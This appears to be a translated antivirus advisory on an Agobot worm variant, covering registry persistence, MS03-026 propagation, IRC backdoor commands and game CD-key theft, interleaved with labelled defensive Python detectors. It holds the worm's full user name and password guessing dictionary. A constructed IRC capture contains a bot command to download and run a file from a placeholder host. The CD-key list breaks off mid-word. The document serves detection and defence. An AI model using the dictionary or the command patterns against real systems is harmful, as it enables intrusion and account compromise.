Virus name:
Worm.Agobot.3.ch.enc
Category: Worm
Virus information:
Damage method:
A variant of the "高波" (Agobot) worm.
The sample is packed with PE Diminisher v0.1 and was written in VC++ 6.0.
Once executed, the worm copies itself into the system folder.
It creates the following registry values so that it starts automatically with Windows (%SYSDIR% is the system folder, %CURFILE% the file name the worm was launched under):
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"nVidia Chip4"="%SYSDIR%\%CURFILE%"
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"nVidia Chip4"="%SYSDIR%\%CURFILE%"
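One way to check a host for the persistence entries above, as an added example that is not part of the advisory or the vendor's tools: the script parses the text `reg export` writes for the Run and RunServices keys and flags a value that carries the advisory's value name, or a system-folder binary registered under both keys (the RunServices key is a Windows 9x/ME mechanism, and legitimate NT-family software almost never sets it). The registry export text is constructed for the example, and the file name gaobot.exe in it is an assumption: the worm keeps whatever name it was launched under.

```python
"""Flag worm-style autorun entries in a Windows registry export (added example)."""
import re

RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
)
SYSTEM_DIRS = (r"c:\winnt\system32", r"c:\windows\system32")  # compared lower-cased
IOC_VALUE_NAMES = ("nVidia Chip4",)  # value name given in the advisory

# Constructed sample of what `reg export` produces on an infected host.
# The worm copies itself into %SYSDIR% under its current file name; the
# name gaobot.exe used here is an assumption, not an indicator from the advisory.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"
"nVidia Chip4"="C:\\WINNT\\system32\\gaobot.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"nVidia Chip4"="C:\\WINNT\\system32\\gaobot.exe"
"""

# "name"="data" with .reg escaping (doubled backslashes, escaped quotes)
_VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    """Undo .reg string escaping: doubled backslashes and escaped double quotes."""
    return s.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg(text):
    """Return {key_path: {value_name: string_data}} for the REG_SZ values of a .reg export.

    dword:/hex: values are ignored; they cannot name an autorun binary.
    """
    entries, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            entries.setdefault(current, {})
        elif current and line.startswith('"'):
            m = _VALUE_RE.match(line)
            if m:
                entries[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return entries


def suspicious_autoruns(entries):
    """Return [(value_name, path, [reasons])] for Run/RunServices values that match this worm."""
    run, runsvc = (entries.get(k, {}) for k in RUN_KEYS)
    hits = []
    for name, data in {**runsvc, **run}.items():
        path = data.strip('"')
        in_sysdir = any(path.lower().startswith(d + "\\") for d in SYSTEM_DIRS)
        reasons = []
        if name in IOC_VALUE_NAMES:
            reasons.append("value name matches the advisory's indicator")
        if in_sysdir and name in run and name in runsvc:
            reasons.append("system-folder binary registered under both Run and RunServices")
        if reasons:
            hits.append((name, path, reasons))
    return hits


if __name__ == "__main__":
    for name, path, reasons in suspicious_autoruns(parse_reg(SAMPLE_REG)):
        print(f"{name!r} -> {path}: {'; '.join(reasons)}")
```

Run it against a real export with `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (and the same for RunServices), concatenated and decoded from UTF-16 before parsing; the second heuristic is what catches a renamed variant that no longer uses the "nVidia Chip4" name.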
Network propagation:
The worm exploits the Remote Procedure Call (RPC) Distributed Component Object Model (DCOM) vulnerability on Windows 2000 and XP systems. The vulnerability allows an attacker to gain full access to the target machine and execute code on it.
It scans port 135 on random TCP/IP addresses to find vulnerable systems on the network.
More information about the vulnerability is available from the following reference:
Microsoft Security Bulletin MS03-026 (CVE-2003-0352)
Hosts patched against MS03-026 cannot be infected through this vector; the share-copy and password-guessing paths below do not depend on the patch.
In addition, the worm creates and executes a copy of itself on the following network shares to which it has full access:
admin$
c$
d$
e$
print$
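The scanning and share-copy behaviour above is visible at the network layer: an infected host touches many distinct addresses on port 135 (RPC/DCOM) within seconds, and then SMB (139/445, the transport for the admin$ and c$ shares) on the hosts it compromised. The following added example, which is not from the advisory, detects that pattern over a constructed connection log. The log format ("timestamp src dst dport", one outbound TCP SYN per line), the threshold and the window are assumptions; map your own firewall or NetFlow export onto the format.

```python
"""Spot a host sweeping port 135 / SMB the way this worm does (added example)."""
from collections import Counter, defaultdict
from datetime import datetime

# 135 = RPC/DCOM (MS03-026); 139/445 = SMB, the path to the admin$/c$ shares.
WORM_PORTS = {135, 139, 445}

# Constructed sample. 10.0.0.23 is infected: ten random targets on 135 in four
# seconds, then a share connection to 10.0.0.40. 10.0.0.5 is a normal client
# talking to one file server and one RPC endpoint.
SAMPLE_LOG = """\
2004-03-10T09:15:01 10.0.0.23 203.0.113.7 135
2004-03-10T09:15:01 10.0.0.23 203.0.113.19 135
2004-03-10T09:15:01 10.0.0.23 198.51.100.88 135
2004-03-10T09:15:02 10.0.0.23 198.51.100.3 135
2004-03-10T09:15:02 10.0.0.23 192.0.2.14 135
2004-03-10T09:15:02 10.0.0.23 192.0.2.200 135
2004-03-10T09:15:03 10.0.0.23 203.0.113.77 135
2004-03-10T09:15:03 10.0.0.23 198.51.100.150 135
2004-03-10T09:15:03 10.0.0.23 192.0.2.33 135
2004-03-10T09:15:04 10.0.0.23 203.0.113.250 135
2004-03-10T09:15:04 10.0.0.23 10.0.0.40 445
2004-03-10T09:15:05 10.0.0.23 10.0.0.40 445
2004-03-10T09:15:06 10.0.0.5 10.0.0.9 445
2004-03-10T09:15:20 10.0.0.5 10.0.0.9 445
2004-03-10T09:15:41 10.0.0.5 10.0.0.10 135
2004-03-10T09:16:02 10.0.0.5 10.0.0.9 445
"""


def detect_sweeps(log_text, ports=WORM_PORTS, threshold=8, window_s=60):
    """Return {(src, port): peak_distinct_dsts} for sources that contact at least
    `threshold` distinct destinations on `port` within any `window_s` seconds.

    threshold/window_s are tuning assumptions: a worm probing random addresses
    clears 8 hosts in seconds, while a user rarely opens RPC/SMB sessions to 8
    different machines in a minute.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        if int(port) in ports:
            events[(src, int(port))].append((datetime.fromisoformat(ts), dst))

    alerts = {}
    for key, evs in events.items():
        evs.sort()
        in_window, lo, peak = Counter(), 0, 0
        for ts, dst in evs:  # sliding window over the time-sorted events
            in_window[dst] += 1
            while (ts - evs[lo][0]).total_seconds() > window_s:
                old = evs[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[key] = peak
    return alerts


if __name__ == "__main__":
    for (src, port), n in detect_sweeps(SAMPLE_LOG).items():
        print(f"{src} reached {n} distinct hosts on tcp/{port} within 60s: likely worm sweep")
```

Counting distinct destinations rather than raw connections is what separates the worm from a busy file-server client: 10.0.0.5 opens four SMB sessions but to a single host, so it never approaches the threshold.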
It also guesses weak IPC$ passwords, trying the following user name and password combinations:
User names:
"Administrateur"
"Coordinatore"
"Administrador"
"Verwalter"
"Ospite"
"kanri"
"kanri-sha"
"admin"
"administrator"
"Default"
"Convidado"
"mgmt"
"Standard"
"User"
"Administrat"
"administrador"
"Owner"
"user"
"server"
"Test"
"Guest"
"Gast"
"Inviter"
"a"
"aaa"
"abc"
"x"
"xyz"
"Dell"
"home"
"pc"
"test"
"temp"
"win"
"asdf"
"qwer"
"OEM"
"root"
"wwwadmin"
"login"
"owner"
"mary"
"admins"
"computer"
"xp"
"OWNER"
"mysql"
"database"
"teacher"
"student"
Passwords:
"admin"
"Admin"
"passWord"
"Password"
"1"
"12"
"123"
"1234"
"!@#$"
"asdfgh"
"!@#$%"
"!@#$%^"
"!@#$%^&"
"!@#$%^&*"
"WindowsXP"
"windows2k"
"windowsME"
"windows98"
"windoze"
"hax"
"dude"
"owned"
"lol"
"ADMINISTRATOR"
"rooted"
"noob"
"TEMP"
"share"
"r00t"
"ROOT"
"TEST"
"SYSTEM"
"LOCAL"
"SERVER"
"Access"
"BACKUP"
"computer"
"fUCked"
"gay"
"idiot"
"Internet"
"test"
"2003"
"2004"
"backdoor"
"whore"
"wh0re"
"CNN"
"pwned"
"own"
"crash"
"passwd"
"PASSWD"
"devil"
"Linux"
"UNIX"
"feds"
"fish"
"changeme"
"ASP"
"PHP"
"666"
"BOX"
"Box"
"box"
"12345"
"123456"
"1234567"
"12345678"
"123456789"
"654321"
"54321"
"111"
"000000"
"00000000"
"11111111"
"88888888"
"pass"
"passwd"
"database"
"abcd"
"Oracle"
"sybase"
"123qwe"
"server"
"computer"
"Internet"
"super"
"123asd"
"ihavenopass"
"godblessyou"
"enable"
"xp"
"2002"
"2003"
"2600"
"0"
"110"
"111111"
"121212"
"123123"
"1234qwer"
"123abc"
"007"
"alpha"
"patrick"
"pat"
"administrator"
"root"
"sex"
"god"
"Foobar"
"a"
"aaa"
"abc"
"test"
"temp"
"win"
"pc"
"asdf"
"secret"
"qwer"
"yxcv"
"zxcv"
"home"
"xxx"
"owner"
"login"
"Login"
"Coordinatore"
"Administrador"
"Verwalter"
"Ospite"
"administrator"
"Default"
"administrador"
"admins"
"teacher"
"student"
"superman"
"supersecret"
"kids"
"penis"
"wwwadmin"
"database"
"changeme"
"test123"
"user"
"private"
"69"
"root"
"654321"
"xxyyzz"
"asdfghjkl"
"mybaby"
"vagina"
"pussy"
"leet"
"metal"
"work"
"school"
"mybox"
"box"
"werty"
"baby"
"porn"
"homework"
"secrets"
"x"
"z"
"qwertyuiop"
"secret"
"Administrateur"
"abc123"
"password123"
"red123"
"qwerty"
"admin123"
"zxcvbnm"
"poiuytrewq"
"pwd"
"pass"
"love"
"mypc"
"mypass"
"pw"
This user name/password dictionary is long, so set passwords that are as complex as possible; at a minimum, a password must not appear in the list above or differ from an entry only by case, a leet substitution or a trailing digit.
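The worm tries every user name above against every password above, so an account resists it only if its password is in neither list and is not a trivial variant of an entry. The following added example (not from the advisory) screens a candidate password that way: it normalises case, the leet substitutions the dictionary itself uses (r00t, wh0re) and digit/punctuation suffixes before comparing, then applies a local-policy minimum. The word list is a constructed subset of the lists above, and the minimum length and class count are assumptions, not something the advisory prescribes.

```python
"""Screen a candidate password against this worm's guessing dictionary (added example)."""
import re

# Representative subset of the worm's lists above, constructed for the example.
# In practice load the full user-name and password lists from the advisory.
WORM_WORDLIST = [
    "admin", "Password", "1234", "!@#$%^", "r00t", "changeme", "godblessyou",
    "123qwe", "ihavenopass", "qwerty", "pw", "administrator", "Administrateur",
]

# Leet letters the dictionary itself uses (r00t, wh0re) plus the common ones.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})
CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def normalize(pw):
    """Canonical form for comparison: lower-case, trailing digits/punctuation
    removed (Password2004 -> password), leet letters unfolded (r00t -> root)."""
    base = pw.lower()
    stripped = re.sub(r"[^a-z]+$", "", base) or base  # keep all-digit entries intact
    return stripped.translate(LEET)


def check_password(pw, wordlist=WORM_WORDLIST, min_len=12, min_classes=3):
    """Return (accepted, reason). min_len/min_classes are local-policy assumptions."""
    if normalize(pw) in {normalize(w) for w in wordlist}:
        return False, "appears in, or is a trivial variant of, the worm's dictionary"
    if len(pw) < min_len:
        return False, f"shorter than {min_len} characters"
    if sum(bool(re.search(c, pw)) for c in CLASSES) < min_classes:
        return False, f"needs at least {min_classes} character classes"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("r00t", "Password2004", "Tr0ub4dor&3", "Gaobot-Dict-2004!x"):
        print(f"{candidate!r}: {check_password(candidate)}")
```

Normalising before the lookup is the point: "Password2004" and "P@ssw0rd" never appear in the list, yet both collapse to "password", which does, so they are rejected before the length rule even runs.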
Backdoor function:
The worm has backdoor functionality that allows a remote user to gain access to the infected system.
It connects to an Internet Relay Chat (IRC) channel and acts as a bot, waiting for the following commands from the attacker:
Send the following system information:
CPU speed
Memory size
Windows platform, version number and product ID
Worm uptime
Currently logged-on user
Disable network shares
Terminate malicious programs
Resolve IP addresses and host names via DNS
Report the bot's status
Execute .EXE files
Open files
Flush the DNS cache
Disable DCOM / disable shares
Disconnect from / reconnect to the IRC server
Change the IRC server
Join a channel
Leave a channel
Send private messages over IRC
Update the worm over HTTP or FTP
Download and execute a file from an HTTP or FTP server
Restart the computer
Shut down the computer
Log off the current user
List all running processes
Launch the following flood attacks against a target machine:
ICMP flood
UDP flood
SYN flood
HTTP flood
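The command channel described above leaves a recognisable trace in a packet capture: the client joins a channel, posts CPU/memory/OS/uptime/user details to it, and answers operator lines that carry URLs or instructions. The following added example (not from the advisory, and not the worm's real command syntax) parses RFC 1459 messages from a constructed session and reports those indicators. The nick format, the ".sysinfo" and ".download" command words, the channel name and the hosts are all constructed for the sample.

```python
"""Recognise IRC bot behaviour in a captured session (added example)."""
import re

# Constructed capture: "C>" lines are client->server, "S>" server->client.
SAMPLE_SESSION = r"""
C> NICK [USA|XP]-82041
C> USER xgjzq 0 0 :xgjzq
S> :irc.example.net 001 [USA|XP]-82041 :Welcome to the network
C> JOIN #ctrl secret
S> :[USA|XP]-82041!xgjzq@10.0.0.23 JOIN :#ctrl
S> :op!op@198.51.100.9 PRIVMSG #ctrl :.sysinfo
C> PRIVMSG #ctrl :cpu: 1993MHz. ram: 511MB. os: Windows XP (5.1, build 2600). uptime: 3d 4h 12m. user: jdoe
S> :op!op@198.51.100.9 PRIVMSG #ctrl :.download http://198.51.100.9/u.exe c:\u.exe 1
C> PRIVMSG #ctrl :downloading http://198.51.100.9/u.exe
"""

# Fields the advisory says the bot reports (CPU, memory, Windows version, uptime, user).
SYSINFO = re.compile(r"\b(cpu|ram|memory|windows|uptime|user|build)\b", re.I)
URL = re.compile(r"\b(?:https?|ftp)://\S+", re.I)


def parse_irc(line):
    """Split one IRC line into (prefix, COMMAND, [params]); a trailing ':' param is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split() + ([trailing] if sep else [])
    return prefix, params[0].upper(), params[1:]


def bot_indicators(session):
    """Return human-readable reasons this session looks like a bot, in the order found."""
    reasons, joined, pending = [], set(), None
    for raw in session.strip().splitlines():
        direction, _, msg = raw.partition("> ")
        _prefix, cmd, params = parse_irc(msg)
        if direction == "C" and cmd == "JOIN":
            joined.add(params[0].lower())
        elif direction == "S" and cmd == "PRIVMSG" and params[0].lower() in joined:
            pending = params[-1]  # an operator line the client may act on
            url = URL.search(pending)
            if url:
                reasons.append(f"channel pushed a URL to the client: {url.group()}")
        elif direction == "C" and cmd == "PRIVMSG" and params[0].lower() in joined:
            text = params[-1]
            if len({m.lower() for m in SYSINFO.findall(text)}) >= 3:
                reasons.append(f"host fingerprint posted to {params[0]}")
            if pending is not None:
                reasons.append(f"automatic reply to channel line {pending.split()[0]!r}")
                pending = None
    return reasons


if __name__ == "__main__":
    for reason in bot_indicators(SAMPLE_SESSION):
        print("bot indicator:", reason)
```

The fingerprint rule keys on the fields the advisory lists rather than on any command word, so it still fires when the operator's command vocabulary differs from the constructed one; the reply rule pairs each operator line with the client message that follows it, which a human chatting in a channel does not produce mechanically.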
Information theft:
It can steal information from the user's system, including:
CD keys, serial numbers and IDs of certain software, such as:
BF1942 CDKey
BF1942 RtR CDKey
BF1942 SWoWWII CDKey
Chrome CDKey
Command & Conquer Generals CDKey
Counter-Strike CDKey
FIFA 2002 CDKey
FIFA 2003 CDKey
Half-Life CDKey
Hidden and Dangerous 2 CDKey
LoMaM CDKey
NFSHP2 CDKey
NHL 2002 CDKey
NHL 2003 CDKey
NOX CDKey
NWN CDKey
Nascar 2002 CDKey
Nascar 2003 CDKey
Project IGI 2 CDKey
Red Alert 2 CDKey
Red Alert CDKey
SOF2 CDKey
The Gladiato
Removal:
Use Guanghua (光华) anti-virus software to remove it completely.
Before returning a cleaned host to the network, apply MS03-026, remove the Run and RunServices values listed above, and change any account password that appears in the dictionary above.
Virus demo:
Virus FAQ:
A Windows PE (Portable Executable) virus.
Discovery date:
2004-03-10